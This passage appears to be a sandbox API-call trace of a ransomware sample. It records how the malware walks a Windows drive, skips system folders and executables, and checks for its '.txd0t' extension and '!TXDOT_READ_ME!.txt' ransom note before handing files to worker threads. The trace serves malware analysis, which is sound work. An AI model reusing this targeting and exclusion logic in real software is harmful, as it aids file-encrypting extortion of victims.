ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0085.252] StrCmpW (psz1="SafeOS", psz2=".") returned 1 [0085.252] StrCmpW (psz1="SafeOS", psz2="..") returned 1 [0085.252] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\$GetCurrent", cchMax=1054 | out: psz1="C:\\$GetCurrent") returned="C:\\$GetCurrent" [0085.253] StrNCatW (in: psz1="C:\\$GetCurrent", psz2="\\", cchMax=1054 | out: psz1="C:\\$GetCurrent\\") returned="C:\\$GetCurrent\\" [0085.253] StrNCatW (in: psz1="C:\\$GetCurrent\\", psz2="SafeOS", cchMax=1054 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system32\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\system\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\local\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\boot\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\perflogs\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\programdata\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\drivers\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\wsus\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="crypt_detect") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="cryptolocker") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="ransomware") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\WINDOWS") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.253] StrStrIW (lpFirst="C:\\$GetCurrent\\SafeOS", lpSrch="C:\\Program Files") returned 0x0 [0085.253] GetProcessHeap () returned 0xe30000 [0085.253] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed76e0 [0085.253] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.253] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\*", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\*") returned="C:\\$GetCurrent\\SafeOS\\*" [0085.253] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2170 [0085.254] StrCmpW (psz1=".", psz2=".") returned 0 [0085.254] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.254] StrCmpW (psz1="..", psz2=".") returned 1 [0085.254] StrCmpW (psz1="..", psz2="..") returned 0 [0085.254] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0085.254] StrCmpW (psz1="GetCurrentOOBE.dll", psz2=".") returned 1 [0085.254] StrCmpW (psz1="GetCurrentOOBE.dll", psz2="..") returned 1 [0085.254] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.254] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0085.254] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentOOBE.dll", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" [0085.254] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0085.255] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootsect.bak") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="iconcache.db") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="thumbs.db") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransomware ") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2=" ransom ") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="debug.txt") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="boot.ini") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="desktop.ini") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="autorun.inf") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntuser.dat") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntldr") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="ntdetect.com") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="bootfont.bin") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentOOBE.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.255] PathFindExtensionW (pszPath="GetCurrentOOBE.dll") returned=".dll" [0085.255] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.255] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0085.255] StrCmpW (psz1="GetCurrentRollback.ini", psz2=".") returned 1 [0085.255] StrCmpW (psz1="GetCurrentRollback.ini", psz2="..") returned 1 [0085.255] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.255] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0085.255] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="GetCurrentRollback.ini", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0085.255] PathFindExtensionW (pszPath="GetCurrentRollback.ini") returned=".ini" [0085.255] StrCmpW (psz1=".ini", psz2=".txd0t") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="bootsect.bak") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="iconcache.db") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="thumbs.db") returned -1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2=" ransomware ") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2=" ransom ") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="debug.txt") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="boot.ini") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="desktop.ini") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="autorun.inf") returned 1 [0085.255] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntuser.dat") returned -1 [0085.256] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntldr") returned -1 [0085.256] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="ntdetect.com") returned -1 [0085.256] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="bootfont.bin") returned 1 [0085.256] StrCmpIW (psz1="GetCurrentRollback.ini", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.256] PathFindExtensionW (pszPath="GetCurrentRollback.ini") returned=".ini" [0085.256] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ini") returned 0x0 [0085.256] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0085.256] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.256] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", cchMax=32000 | out: psz1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0085.256] SetEvent (hEvent=0x410) returned 1 [0085.257] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0085.257] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2=".") returned 1 [0085.257] StrCmpW (psz1="PartnerSetupComplete.cmd", psz2="..") returned 1 [0085.257] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.257] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0085.257] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="PartnerSetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0085.261] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0085.264] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0085.264] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootsect.bak") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="iconcache.db") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="thumbs.db") returned -1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransomware ") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2=" ransom ") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="debug.txt") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="boot.ini") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="desktop.ini") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="autorun.inf") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntuser.dat") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntldr") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="ntdetect.com") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="bootfont.bin") returned 1 [0085.266] StrCmpIW (psz1="PartnerSetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.266] PathFindExtensionW (pszPath="PartnerSetupComplete.cmd") returned=".cmd" [0085.266] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0085.266] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0085.267] StrCmpW (psz1="preoobe.cmd", psz2=".") returned 1 [0085.267] StrCmpW (psz1="preoobe.cmd", psz2="..") returned 1 [0085.268] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.268] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0085.269] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="preoobe.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0085.270] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0085.270] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="bootsect.bak") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="iconcache.db") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="thumbs.db") returned -1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2=" ransomware ") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2=" ransom ") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="debug.txt") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="boot.ini") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="desktop.ini") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="autorun.inf") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="ntuser.dat") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="ntldr") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="ntdetect.com") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="bootfont.bin") returned 1 [0085.270] StrCmpIW (psz1="preoobe.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.270] PathFindExtensionW (pszPath="preoobe.cmd") returned=".cmd" [0085.270] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0085.270] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0085.270] StrCmpW (psz1="SetupComplete.cmd", psz2=".") returned 1 [0085.270] StrCmpW (psz1="SetupComplete.cmd", psz2="..") returned 1 [0085.270] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\$GetCurrent\\SafeOS", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS") returned="C:\\$GetCurrent\\SafeOS" [0085.270] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS", psz2="\\", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\") returned="C:\\$GetCurrent\\SafeOS\\" [0085.270] StrNCatW (in: psz1="C:\\$GetCurrent\\SafeOS\\", psz2="SetupComplete.cmd", cchMax=1068 | out: psz1="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0085.270] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0085.270] StrCmpW (psz1=".cmd", psz2=".txd0t") returned -1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootsect.bak") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="iconcache.db") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="thumbs.db") returned -1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransomware ") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2=" ransom ") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="debug.txt") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="boot.ini") returned 1 [0085.270] StrCmpIW (psz1="SetupComplete.cmd", psz2="desktop.ini") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="autorun.inf") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntuser.dat") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntldr") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="ntdetect.com") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="bootfont.bin") returned 1 [0085.271] StrCmpIW (psz1="SetupComplete.cmd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.271] PathFindExtensionW (pszPath="SetupComplete.cmd") returned=".cmd" [0085.271] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".cmd") returned=".cmd|.url|.mui" [0085.271] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0085.271] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0085.271] GetProcessHeap () returned 0xe30000 [0085.271] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.271] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0085.271] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0085.271] GetProcessHeap () returned 0xe30000 [0085.271] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3e88 | out: hHeap=0xe30000) returned 1 [0085.271] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0085.271] StrCmpW (psz1="$Recycle.Bin", psz2=".") returned -1 [0085.271] StrCmpW (psz1="$Recycle.Bin", psz2="..") returned -1 [0085.271] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0085.271] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=".") returned -1 [0085.271] StrCmpW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="..") returned -1 [0085.271] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0085.271] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0085.271] StrNCatW (in: psz1="C:\\", psz2="$WINRE_BACKUP_PARTITION.MARKER", cchMax=1030 | out: psz1="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned="C:\\$WINRE_BACKUP_PARTITION.MARKER" [0085.271] PathFindExtensionW (pszPath="$WINRE_BACKUP_PARTITION.MARKER") returned=".MARKER" [0085.271] StrCmpW (psz1=".MARKER", psz2=".txd0t") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootsect.bak") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="iconcache.db") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="thumbs.db") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransomware ") returned 1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2=" ransom ") returned 1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="debug.txt") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="boot.ini") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="desktop.ini") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="autorun.inf") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntuser.dat") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntldr") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="ntdetect.com") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="bootfont.bin") returned -1 [0085.272] StrCmpIW (psz1="$WINRE_BACKUP_PARTITION.MARKER", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.272] PathFindExtensionW 